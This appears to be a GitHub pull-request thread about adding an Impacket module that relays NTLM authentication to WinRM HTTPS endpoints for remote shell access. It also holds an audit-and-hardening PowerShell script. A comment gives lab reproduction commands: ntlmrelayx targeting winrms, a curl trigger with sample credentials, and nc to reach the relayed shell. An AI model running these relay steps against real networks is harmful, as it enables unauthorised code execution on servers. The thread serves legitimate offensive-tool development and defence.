
@Dfte
Contributor

@Dfte Dfte commented Apr 14, 2025

This PR adds a new relay capability allowing us to relay SMB/LDAP/HTTP NTLM (v1 or unsecured ones) authentications to the WinRM HTTPS endpoint.

This endpoint is not configured on a default server installation but it is not protected by Channel Binding once configured by a sysadmin, which makes it a possible great relay alternative for remote code execution.

Default action creates an interactive TCP shell that can be used via NC (socks is also implemented):


This PR was created by Joseph Mondloch (jmk@foofus) and me :)

@NeffIsBack
Contributor

That's some crazy stuff, good job @Dfte!

@Dfte
Contributor Author

Dfte commented Apr 17, 2025

Updates needed. I realized far too late that this technique was working on my environments because NTLMv1 was enabled. This technique won't work for NTLMv2 as is. Yet, I believe this can still be an interesting use case to add to Impacket as this module can still be used if:

  • NTLMv1 is activated (natively or via downgrade attacks) ;
  • MITM allows redirecting legitimate WinRM connections to our listener ;
  • WinRM listener is configured to not support CBT (CBT=None).

Once again, sorry for the misinformation and feel free to add/deny this feature :)
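The three preconditions listed above are all server-side settings an administrator can audit. The following PowerShell script is an added example, not part of this PR or of Impacket: it reports whether a host still matches the two conditions under the administrator's control (an HTTPS listener with CbtHardeningLevel=None, and NTLMv1 still accepted because LmCompatibilityLevel is below 5), and applies the hardened values when run with -Remediate.

```powershell
#Requires -RunAsAdministrator
# Added audit script (not part of this PR or of Impacket). Checks the server-side
# preconditions named in the thread: WinRM CbtHardeningLevel=None and NTLMv1 accepted.
# Report-only by default; -Remediate applies the hardened values.
param([switch]$Remediate)

$findings = @()

# 1. Is a WinRM HTTPS listener configured at all? (Not present on a default install.)
$https = Get-WSManInstance -ResourceURI winrm/config/Listener -Enumerate |
    Where-Object Transport -eq 'HTTPS'
if ($https) {
    Write-Output ("WinRM HTTPS listener(s) on port(s): " + (($https | ForEach-Object Port) -join ', '))
} else {
    Write-Output 'No WinRM HTTPS listener configured.'
}

# 2. Channel binding on the service side. 'None' is the relayable setting from the thread;
#    'Strict' rejects NTLM tokens whose channel binding does not match the TLS channel.
$cbt = (Get-Item WSMan:\localhost\Service\Auth\CbtHardeningLevel).Value
if ($cbt -ne 'Strict') {
    $findings += "CbtHardeningLevel is '$cbt' (expected Strict)"
    if ($Remediate) { Set-Item WSMan:\localhost\Service\Auth\CbtHardeningLevel -Value Strict }
}

# 3. NTLMv1 acceptance. Only level 5 makes the server refuse LM and NTLMv1 responses;
#    an absent value means the OS default (3), which still accepts NTLMv1.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$lm = (Get-ItemProperty -Path $lsa -Name LmCompatibilityLevel -ErrorAction SilentlyContinue).LmCompatibilityLevel
if ($null -eq $lm -or $lm -lt 5) {
    $shown = if ($null -eq $lm) { 'not set (default 3)' } else { $lm }
    $findings += "LmCompatibilityLevel is $shown (expected 5, NTLMv2 only)"
    if ($Remediate) { Set-ItemProperty -Path $lsa -Name LmCompatibilityLevel -Value 5 -Type DWord }
}

if ($findings) { $findings | ForEach-Object { Write-Output "FINDING: $_" } }
else { Write-Output 'Neither relay precondition from the thread is present on this host.' }
```

LmCompatibilityLevel changes take effect at the next logon session; the CbtHardeningLevel change applies to new WinRM connections immediately.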

@Dfte
Contributor Author

Dfte commented Apr 21, 2025

Have seen the error which made me realize I forgot to include latest WinRMrelayserver upgrades. And I fixed the spelling issues as well so hopefully I'll push all the updates in a couple of days :)

@Dfte
Contributor Author

Dfte commented Apr 22, 2025

At this point I have added:

  • The WinRMRelayServer and WinRMSRelayServer which allow catching NTLM authentication over these two protocols ;
  • The WinRMAttack which allows relaying to:
    • Anything if NTLMv1 is used ;
    • WinRMS endpoints if configured with CBT=None

:P

@dadevel
Contributor

dadevel commented Apr 27, 2025

For anybody who wants to play around with this PR:

Setup WinRMS.

New-SelfSignedCertificate -Subject 'CN=dc01.corp.local' -TextExtension '2.5.29.37={text}1.3.6.1.5.5.7.3.1'
winrm create 'winrm/config/Listener?Address=*+Transport=HTTPS' '@{Hostname="dc01.corp.local"; CertificateThumbprint="9592A6D026E71AFFA17049D16D74AA7C47A89788"}'
New-NetFirewallRule -DisplayName 'WinRM HTTPS' -Direction 'Inbound' -LocalPort 5986 -Protocol 'TCP' -Action 'Allow' -Program 'System'

Start relay server.

ntlmrelayx.py -debug --no-smb-server --no-wcf-server --no-raw-server -t winrms://dc01.corp.local

Trigger authentication.

curl http://localhost -u 'corp\administrator:passw0rd' --ntlm

Get shell.

nc -v 127.0.0.1 11000

@Dfte
Contributor Author

Dfte commented Jun 17, 2025

Hey @anadrianmanrique any news on this one? Considering it doesn't change any files or structures but simply adds new ones, can we merge that?

@anadrianmanrique
Collaborator

anadrianmanrique commented Jun 22, 2025

@Dfte sorry for not answering, I was OOO last week. I think this is a great feature despite the limitations with NTLMv2. We are planning to integrate it in the context of the 0.13 version, which is soon to be released. Glad to see that you reopened it #1987
